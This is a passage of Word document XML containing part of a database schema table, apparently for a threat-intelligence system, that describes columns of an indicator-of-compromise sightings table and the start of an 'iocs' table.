              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">NULLABLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored value, e.g. the date of the last report.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">updated_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT NOW()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Time of the last change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ioc_sightings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK (source, source_id, type, value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">event, detection or capture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">source_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">BIGINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Row id of the event, detection or capture that contained the indicator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">type, value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TEXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">PK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The indicator, matching iocs (type, value).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="75AF2A9E" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">seen_at</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TIMESTAMPTZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DEFAULT NOW()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Time the sighting was recorded; iocs.hits is the number of sightings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003272AD" w14:paraId="46E90CCB" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">iocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
